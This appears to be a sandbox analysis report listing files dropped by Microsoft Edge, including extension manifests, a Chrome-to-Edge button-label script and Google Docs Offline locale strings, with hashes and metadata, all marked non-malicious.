                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 276634
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):263704
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.998774950072608
                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                  SSDEEP:6144:vj1QHfvuVtTT0bCnop1MIPG4y9XgcbKdhRuQRhzb6d0X7ayNC:vjq/GGCnorP0952dPuQRFW0X2yk
                                                                                                                                                                                                                                                                                  MD5:EF6DB67B82032D675EA4E61A73D3C358
                                                                                                                                                                                                                                                                                  SHA1:882A4CF2944FC8E27F435890DF647177AD167CB0
                                                                                                                                                                                                                                                                                  SHA-256:97C885F4390FFAE57EF240B46E113A0DFF637A003B6AD54031A1AA6809956276
                                                                                                                                                                                                                                                                                  SHA-512:B41B3CD76F50964CD4FA0AB18BEB785FA592CB92045B3455D238799A1167CB5190EB1C7E0216E1E874AA03A8686025A6B366926023C9C56834B92B4F612D0A18
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1753
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.8889033066924155
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:Pxpr7Xka2NXDpfsBJODI19Kg1JqcJW9O//JE3ZBDcpu/x:L3XgNSz9/4kIO3u3Xgpq
                                                                                                                                                                                                                                                                                  MD5:738E757B92939B24CDBBD0EFC2601315
                                                                                                                                                                                                                                                                                  SHA1:77058CBAFA625AAFBEA867052136C11AD3332143
                                                                                                                                                                                                                                                                                  SHA-256:D23B2BA94BA22BBB681E6362AE5870ACD8A3280FA9E7241B86A9E12982968947
                                                                                                                                                                                                                                                                                  SHA-512:DCA3E12DD5A9F1802DB6D11B009FCE2B787E79B9F730094367C9F26D1D87AF1EA072FF5B10888648FB1231DD83475CF45594BB0C9915B655EE363A3127A5FFC2
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:[.. {.. "description": "treehash per file",.. "signed_content": {.. "payload": "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",.. "signatures": [.. {.. "header": {.. "kid": "publisher".. },.. "protected": "eyJhbGciOiJSUzI1NiJ9",.. "signature": "UglEEilkOml5P1W0X6wc-_dB87PQB73uMir11923av57zPKujb4IUe_lbGpn7cRZsy6x-8i9eEKxAW7L2TSmYqrcp4XtiON6ppcf27FWACXOUJDax9wlMr-EOtyZhykCnB9vR
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8031), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):9815
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.1716321262973315
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3zEScQZBMX:+ThBVq3npozftROQIyVfjRZGB365Ey97
                                                                                                                                                                                                                                                                                  MD5:3D20584F7F6C8EAC79E17CCA4207FB79
                                                                                                                                                                                                                                                                                  SHA1:3C16DCC27AE52431C8CDD92FBAAB0341524D3092
                                                                                                                                                                                                                                                                                  SHA-256:0D40A5153CB66B5BDE64906CA3AE750494098F68AD0B4D091256939EEA243643
                                                                                                                                                                                                                                                                                  SHA-512:315D1B4CC2E70C72D7EB7D51E0F304F6E64AC13AE301FD2E46D585243A6C936B2AD35A0964745D291AE9B317C316A29760B9B9782C88CC6A68599DB531F87D59
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (8604), with no line terminators
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):10388
                                                                                                                                                                                                                                                                                  Entropy (8bit):6.174387413738973
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:+ThBV4L3npstQp6VRtROQGZ0UyVg4jq4HWeGBnUi65Ep4HdlyKyjFN3EbmE1F4fn:+ThBVq3npozftROQIyVfjRZGB365Ey9+
                                                                                                                                                                                                                                                                                  MD5:3DE1E7D989C232FC1B58F4E32DE15D64
                                                                                                                                                                                                                                                                                  SHA1:42B152EA7E7F31A964914F344543B8BF14B5F558
                                                                                                                                                                                                                                                                                  SHA-256:D4AA4602A1590A4B8A1BCE8B8D670264C9FB532ADC97A72BC10C43343650385A
                                                                                                                                                                                                                                                                                  SHA-512:177E5BDF3A1149B0229B6297BAF7B122602F7BD753F96AA41CCF2D15B2BCF6AF368A39BB20336CCCE121645EC097F6BEDB94666C74ACB6174EB728FBFC43BC2A
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:(()=>{"use strict";var e={1:(e,o)=>{Object.defineProperty(o,"__esModule",{value:!0}),o.newCwsPromotionalButtonCta=o.chromeToEdgeCwsButtonCtaMapping=void 0,o.chromeToEdgeCwsButtonCtaMapping={"...... ... Chrome":"...... ....","........ .. Chrome":".....",........:"..........",".......... .. Chrome":"..........","Chrome . .....":"...","Chrome .... ....":"....","Afegeix a Chrome":"Obt.n","Suprimeix de Chrome":"Suprimeix","P.idat do Chromu":"Z.skat","Odstranit z Chromu":"Odebrat","F.j til Chrome":"F.","Fjern fra Chrome":"Fjerne",Hinzuf.gen:"Abrufen","Aus Chrome entfernen":"Entfernen","Add to Chrome":"Get","Remove from Chrome":"Remove","A.adir a Chrome":"Obtener",Desinstalar:"Quitar","Agregar a Chrome":"Obtener","Eliminar de Chrome":"Quitar","Lisa Chrome'i":"Hangi","Chrome'ist eemaldamine":"Eemalda",.......H:"........","......... ... .. Chr
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):962
                                                                                                                                                                                                                                                                                  Entropy (8bit):5.698567446030411
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1Hg9+D3DRnbuF2+sUrzUu+Y9VwE+Fg41T1O:NBqY+6E+F7JO
                                                                                                                                                                                                                                                                                  MD5:E805E9E69FD6ECDCA65136957B1FB3BE
                                                                                                                                                                                                                                                                                  SHA1:2356F60884130C86A45D4B232A26062C7830E622
                                                                                                                                                                                                                                                                                  SHA-256:5694C91F7D165C6F25DAF0825C18B373B0A81EA122C89DA60438CD487455FD6A
                                                                                                                                                                                                                                                                                  SHA-512:049662EF470D2B9E030A06006894041AE6F787449E4AB1FBF4959ADCB88C6BB87A957490212697815BB3627763C01B7B243CF4E3C4620173A95795884D998A75
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "content_scripts": [ {.. "js": [ "content.js" ],.. "matches": [ "https://chrome.google.com/webstore/*" ].. }, {.. "js": [ "content_new.js" ],.. "matches": [ "https://chromewebstore.google.com/*" ].. } ],.. "description": "Edge relevant text changes on select websites to improve user experience and precisely surfaces the action they want to take.",.. "key": "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu06p2Mjoy6yJDUUjCe8Hnqvtmjll73XqcbylxFZZWe+MCEAEK+1D0Nxrp0+IuWJL02CU3jbuR5KrJYoezA36M1oSGY5lIF/9NhXWEx5GrosxcBjxqEsdWv/eDoOOEbIvIO0ziMv7T1SUnmAA07wwq8DXWYuwlkZU/PA0Mxx0aNZ5+QyMfYqRmMpwxkwPG8gyU7kmacxgCY1v7PmmZo1vSIEOBYrxl064w5Q6s/dpalSJM9qeRnvRMLsszGY/J2bjQ1F0O2JfIlBjCOUg/89+U8ZJ1mObOFrKO4um8QnenXtH0WGmsvb5qBNrvbWNPuFgr2+w5JYlpSQ+O8zUCb8QZwIDAQAB",.. "manifest_version": 3,.. "name": "Edge relevant text changes",.. "update_url": "https://edge.microsoft.com/extensionwebstorebase/v1/crx",.. "version": "1.2.1"..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):11185
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                  MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                  SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                  SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                  SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):138356
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.809609231921042
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
                                                                                                                                                                                                                                                                                  MD5:3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
                                                                                                                                                                                                                                                                                  SHA1:9B73F46ADFA1F4464929B408407E73D4535C6827
                                                                                                                                                                                                                                                                                  SHA-256:19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
                                                                                                                                                                                                                                                                                  SHA-512:D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):4982
                                                                                                                                                                                                                                                                                  Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                  MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                  SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                  SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                  SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):908
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                  MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                  SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                  SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                  SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1285
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                  MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                  SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                  SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                  SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1244
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                  MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                  SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                  SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                  SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):977
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                  MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                  SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                  SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                  SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):3107
                                                                                                                                                                                                                                                                                  Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                  MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                  SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                  SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                  SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1389
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):1763
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):930
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):913
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):806
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                  Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.
                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                  Size (bytes):883
                                                                                                                                                                                                                                                                                  Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                  Malicious:false
